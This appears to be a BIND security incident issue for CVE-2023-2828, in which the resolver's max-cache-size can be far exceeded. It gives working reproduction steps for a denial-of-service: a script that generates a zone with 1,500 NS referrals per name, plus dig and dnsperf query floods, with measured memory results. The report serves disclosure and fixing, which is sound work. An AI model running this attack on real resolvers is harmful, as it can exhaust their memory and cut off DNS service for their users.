[CVE-2023-2828] named's configured cache size limit can be significantly exceeded

Quick Links	🔗
Incident Manager:	@michal
Deputy Incident Manager:	@aram
Public Disclosure Date:	2023-06-21
CVSS Score:	7.5
Security Advisory:	isc-private/printing-press!54
Mattermost Channel:	CVE-2023-2828: max-cache-size can be significantly exceeded
Support Ticket:	N/A
Release Checklist:	#4123 (closed)
Post-mortem Etherpad:	postmortem-2023-06

💡 Click here (internal resource) for general information about the security incident handling process.

Earlier Than T-5

At T-5

🔗 (Support) Send ASN to eligible customers
🔗 (Support) (BIND 9 only) Send a pre-announcement email to the bind-announce mailing list to alert users that the upcoming release will include security fixes

At T-4

🔗 (Support) Verify that all ASN-eligible customers have received the notification email

At T-1

🔗 (Support) Verify that any new or reinstated customers have received the notification email
🔗 (First IM) Send notifications to OS packagers

On the Day of Public Disclosure

🔗 (IM) Grant Support clearance to proceed with public release
🔗 (Support) Publish the releases (as outlined in the release checklist)
🔗 (Support) (BIND 9 only) Update vulnerability matrix in the Knowledge Base
🔗 (Support) Bump Document Version for the Security Advisory and publish it in the Knowledge Base
🔗 (First IM) Send notification emails to third parties
🔗 (First IM) Advise MITRE about the disclosed CVEs
🔗 (First IM) Merge the Security Advisory merge request
🔗 (IM) Inform original reporter (if external) that the security disclosure process is complete
🔗 (Support) Inform customers a fix has been released

After Public Disclosure

🔗 (First IM) Organize post-mortem meeting and make sure it happens
🔗 (Support) Close support tickets
🔗 (QA) Merge a regression test reproducing the bug into all affected (and still maintained) branches

Summary

This vulnerability causes a DNS resolver's memory usage to grow well beyond the configured maximum cache size. This happens when the resolver receives around 20,000 queries over a period of several minutes to several hours. For example, at 250 QPS, the resolver uses 1000MB of RAM after 80 seconds when max-cache-size is set to 32MB (example results are attached to this message).

BIND version used

BIND 9.16.40 (Extended Support Version) id:113a865

Steps to reproduce

We reproduced the NRDelegationAttack with some modifications. For details, see: https://www.usenix.org/system/files/sec23fall-prepub-309-afek.pdf

Set the maximum cache size to 32MB in named.conf.options (attached example: named.conf.options):

options {
    ...
    max-cache-size 32m;
    ...
};

Run the resolver: named -g -c /etc/named.conf
Run psrecord to record the resolver's RAM usage: psrecord NAMED_PID --interval 1 --plot OUTPUT_FILE.png
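psrecord samples the process's memory at a fixed interval. Where psrecord is not available, a minimal Linux-only sketch of the same measurement reads the resident set size (VmRSS) from /proc/<pid>/status once per interval. The script and its function names (parse_vmrss_kib, sample_rss_mib) are hypothetical and were not part of the original test setup.

```python
import sys
import time


def parse_vmrss_kib(status_text: str) -> int:
    """Return the VmRSS value (in KiB) from the contents of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("VmRSS:"):
            # The line looks like "VmRSS:     123456 kB"
            return int(line.split()[1])
    raise ValueError("VmRSS not found (is the process still running?)")


def sample_rss_mib(pid: int, interval: float = 1.0, samples: int = 60):
    """Yield (elapsed_seconds, rss_mib) pairs for the given PID (Linux only)."""
    start = time.monotonic()
    for _ in range(samples):
        with open(f"/proc/{pid}/status") as f:
            kib = parse_vmrss_kib(f.read())
        yield time.monotonic() - start, kib / 1024
        time.sleep(interval)


if __name__ == "__main__" and len(sys.argv) > 1:
    # Usage: python rss_sampler.py NAMED_PID  (prints "seconds,MiB" per sample)
    for elapsed, mib in sample_rss_mib(int(sys.argv[1])):
        print(f"{elapsed:.0f},{mib:.1f}", flush=True)
```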
Option a:

Send up to 50,000 DNS queries for names under my domain, shoham-shani.online (its authoritative server's IP address is 74.234.116.29):

dig shoham{count}.shoham-shani.online. @resolver_ip (where count ranges from 0 to 49,999). Alternatively, use dnsperf: dnsperf -d queries.txt -s resolver_ip -v -Q 250 (example attached: queries.txt).
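The attached queries.txt is not reproduced here. Assuming it uses dnsperf's standard input format (one "name type" pair per line) and that the queries are for A records (the record type is an assumption), an equivalent file covering shoham0 through shoham49999 could be generated like this:

```python
def make_queries(count: int = 50_000, domain: str = "shoham-shani.online.",
                 qtype: str = "A") -> list[str]:
    """Build dnsperf input lines: one '<qname> <qtype>' pair per query."""
    return [f"shoham{i}.{domain} {qtype}" for i in range(count)]


if __name__ == "__main__":
    # Writes queries.txt in the current directory
    with open("queries.txt", "w") as f:
        f.write("\n".join(make_queries()) + "\n")
```

With -Q 250, dnsperf caps the rate at 250 queries per second, so 20,000 queries take about 80 seconds.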

Alternatively, you can provide us with a test resolver to attack, and we will run the attack from our client side at a mutually agreed time.

Option b:

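Create a zone file (an example is attached) that returns 1,500 referrals (NS records) per query. You can use this script to generate it:

with open('zonefile.txt', 'w') as f:
    # i runs 0..49,999 to match the queried names shoham0 .. shoham49999
    for i in range(0, 50000):
        # 1,500 NS records (referrals) per delegated name
        for j in range(0, 1500):
            print(f'shoham{i} 8600 IN NS attack{j}.auth{j}.shoham.store.', file=f)

Attached example: shoham-shani.online_zonefile_example.txt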

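Create a second zone file, for shoham.store., that answers all queries for names under that domain (including the attack{j}.auth{j}.shoham.store. nameserver names used in the referrals), for example with a wildcard record: * IN A 127.0.0.1 (attached example: shoham.store_zonefile_example_copy.txt). Then send 50,000 DNS queries as described in option a.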

Take a dump of the cache and examine its size: rndc dumpdb -cache
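rndc dumpdb -cache writes the cache to the file named by the dump-file option (named_dump.db by default). A rough way to see what dominates the dump is to count records by type. This sketch assumes one record per line with the type mnemonic appearing as its own token, skips comment and $-directive lines, and only recognizes the types listed in KNOWN_TYPES, so treat the counts as approximate; the script and function name are hypothetical.

```python
import sys
from collections import Counter

# Record types to tally; extend as needed (an assumption, not an exhaustive list).
KNOWN_TYPES = {"A", "AAAA", "NS", "CNAME", "SOA", "DS", "DNSKEY",
               "RRSIG", "NSEC", "NSEC3", "MX", "TXT", "PTR"}


def count_types(dump_text: str) -> Counter:
    """Approximate per-type record counts for a cache dump, one record per line."""
    counts: Counter = Counter()
    for raw in dump_text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "$")):
            continue  # skip blank lines, comments, and directives such as $DATE
        for token in line.split():
            if token in KNOWN_TYPES:
                counts[token] += 1
                break  # the first matching token is taken as the record type
    return counts


if __name__ == "__main__" and len(sys.argv) > 1:
    # Usage: python count_dump.py named_dump.db
    with open(sys.argv[1], encoding="utf-8", errors="replace") as f:
        for rtype, n in count_types(f.read()).most_common():
            print(f"{rtype:<8} {n}")
```

In a run of this attack, NS records would be expected to dominate the counts.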
Stop the resolver service and retrieve the OUTPUT_FILE.png image to examine RAM usage over time.

Note: we tested with max-cache-size set to 32MB, 64MB, and 1GB, and at rates of 1, 5, 10, 13, 100, and 250 QPS (all results are attached).

For 1 QPS I got 440MB RAM used after 8,000 seconds for max-cache-size 32MB

For 5 QPS I got 840MB RAM used after 4,000 seconds for max-cache-size 32MB

For 10 QPS I got 840MB RAM used after 2,000 seconds for max-cache-size 32MB

For 100 QPS I got 840MB RAM used after 200 seconds for max-cache-size 32MB

For 250 QPS I got 1000MB RAM used after 80 seconds for max-cache-size 32MB

For 13 QPS I got 1550MB RAM used after 1150 seconds for max-cache-size 1000MB
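Multiplying each rate by the elapsed time gives the number of queries sent before the reported memory level was reached. Four of the six runs (5, 10, 100, and 250 QPS) reached it after exactly 20,000 queries, which matches the "around 20,000 requests" figure in the summary; the 13 QPS run (1000MB limit) took 14,950 and the 1 QPS run 8,000. The values below are copied from the results above.

```python
# (QPS, seconds, RAM used in MB, max-cache-size in MB), copied from the reported results
RESULTS = [
    (1, 8_000, 440, 32),
    (5, 4_000, 840, 32),
    (10, 2_000, 840, 32),
    (100, 200, 840, 32),
    (250, 80, 1_000, 32),
    (13, 1_150, 1_550, 1_000),
]


def queries_sent(qps: int, seconds: int) -> int:
    """Total queries sent at a constant rate."""
    return qps * seconds


for qps, secs, ram, limit in RESULTS:
    total = queries_sent(qps, secs)
    print(f"{qps:>3} QPS x {secs:>5} s = {total:>6} queries; "
          f"RAM {ram} MB is {ram / limit:.2f}x the {limit} MB limit")
```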

What is the current bug behavior?

The cache grows beyond the configured limit, so the amount of allocated memory keeps increasing. If the machine runs out of memory, the resolver crashes.
The referral list buffer is never freed, so memory allocated for buffers keeps growing (see the dns_rdataslab_fromrdataset function at line 272 of rdataslab.c).
It appears that the cache size calculation does not account for referral answers from authoritative nameservers, even though they are stored in the cache.
The high and low watermarks are incorrectly set to 0, so the resolver never detects that memory usage exceeds the maximum and never reduces it.
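The watermark point can be illustrated with a toy model of high/low watermark hysteresis. This is a sketch, not BIND's code: update_overmem and trace are hypothetical names, treating a zero high watermark as "disabled" is a modeling assumption, and the thresholds of 7/8 and 3/4 of max-cache-size are assumed for illustration. The memory readings are made-up values, not measurements from this report.

```python
def update_overmem(in_use: int, hiwater: int, lowater: int, overmem: bool) -> bool:
    """Return the new 'over memory' state using high/low watermark hysteresis.

    Model assumption: hiwater == 0 means the watermarks are disabled.
    """
    if hiwater == 0:
        return False              # never signals overmem, so cleaning never starts
    if not overmem and in_use > hiwater:
        return True               # crossed the high watermark: start cleaning
    if overmem and in_use < lowater:
        return False              # fell below the low watermark: stop cleaning
    return overmem


def trace(usages, hiwater, lowater):
    """Feed a sequence of memory readings through the detector."""
    state, states = False, []
    for used in usages:
        state = update_overmem(used, hiwater, lowater, state)
        states.append(state)
    return states


MIB = 1024 * 1024
limit = 32 * MIB                                   # max-cache-size 32m
hi, lo = limit - limit // 8, limit - limit // 4    # assumed 7/8 and 3/4 of the limit
usages = [u * MIB for u in (10, 30, 40, 28, 20, 500, 1000)]  # hypothetical readings
print(trace(usages, hi, lo))   # watermarks set
print(trace(usages, 0, 0))     # watermarks zero
```

With the watermarks set, the detector flags the overmem condition once usage passes the high watermark and clears it only after usage drops below the low one; with both at 0 it never fires, so nothing triggers cleaning however large memory usage grows.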

What is the expected correct behavior?

The cache size should not exceed the configured maximum.
The buffer (rawbuf in rdataslab.c) should be freed.
The cache size calculation should include referral lists, and entries should be deleted when the cache exceeds the configured limit.
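A minimal sketch of the expected behavior is a size-bounded LRU cache in which every stored RRset, referrals included, is charged against the limit. BoundedCache is a hypothetical illustration, not BIND's cache implementation, and the per-record size of 40 bytes is an assumed figure.

```python
from collections import OrderedDict


class BoundedCache:
    """Toy LRU cache that charges every stored RRset, referrals included,
    against max_size and evicts the least recently used entries when over it."""

    def __init__(self, max_size: int):
        self.max_size = max_size
        self.used = 0
        self.entries = OrderedDict()    # key -> size in bytes, oldest first

    def put(self, key: str, size: int) -> None:
        if key in self.entries:
            self.used -= self.entries.pop(key)
        self.entries[key] = size        # newest entries go to the end
        self.used += size               # referral data is charged like any other data
        while self.used > self.max_size and self.entries:
            _, evicted = self.entries.popitem(last=False)   # drop the oldest entry
            self.used -= evicted


# Hypothetical numbers: 20,000 referral RRsets of 1,500 NS records each,
# assuming about 40 bytes per record (60,000 bytes per RRset).
cache = BoundedCache(32 * 1024 * 1024)     # max-cache-size 32m
for i in range(20_000):
    cache.put(f"shoham{i}.shoham-shani.online./NS", 1_500 * 40)
print(len(cache.entries), cache.used, cache.max_size)
```

Because referral RRsets are charged like any other data, the cache stays at or below 32 MiB (559 entries of 60,000 bytes) no matter how many referrals arrive.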

Relevant configuration files

Configuration file: named.conf.options

Zone files: shoham-shani.online_zonefile_example.txt, shoham.store_zonefile_example copy.txt

Relevant logs and/or screenshots

Test results are attached.

Possible fixes

Free the buffer:


free_rawbuf:
    isc_mem_put(mctx, rawbuf, buflen);
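In C, a label such as free_rawbuf: is the usual goto-cleanup idiom: every exit path jumps to it so the temporary allocation is returned with isc_mem_put. The same "release on every path" guarantee can be sketched in Python with try/finally around a hypothetical tracking allocator. MemContext, get, put, and build_slab are illustrative names that only loosely mirror isc_mem_get/isc_mem_put and are not BIND APIs; the point is that the outstanding byte count returns to zero whether the function succeeds or fails.

```python
class MemContext:
    """Hypothetical allocator that tracks outstanding bytes, like a memory context."""

    def __init__(self) -> None:
        self.outstanding = 0

    def get(self, size: int) -> bytearray:
        self.outstanding += size
        return bytearray(size)

    def put(self, buf: bytearray, size: int) -> None:
        self.outstanding -= size


def build_slab(mctx: MemContext, records: list, fail: bool = False) -> bytes:
    """Copy records into a temporary buffer and return a packed copy.

    The temporary buffer is released on every exit path, the Python
    equivalent of jumping to a free_rawbuf: label before returning.
    """
    buflen = sum(len(r) for r in records)
    rawbuf = mctx.get(buflen)
    try:
        if fail:
            raise ValueError("simulated error while building the slab")
        offset = 0
        for r in records:
            rawbuf[offset:offset + len(r)] = r
            offset += len(r)
        return bytes(rawbuf)          # the caller receives its own copy
    finally:
        mctx.put(rawbuf, buflen)      # always runs, on success or on error
```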

Please add the following people to this issue:

Yehuda Afek, yehuda.afek@gmail.com /cc @afek
Anat Bremler-Barr, anat.bremlerbarr@gmail.com /cc @anat_bremler_barr
Yuval Shavitt, shavitt@eng.tau.ac.il

Edited Jul 26, 2023 by Nicki Křížek
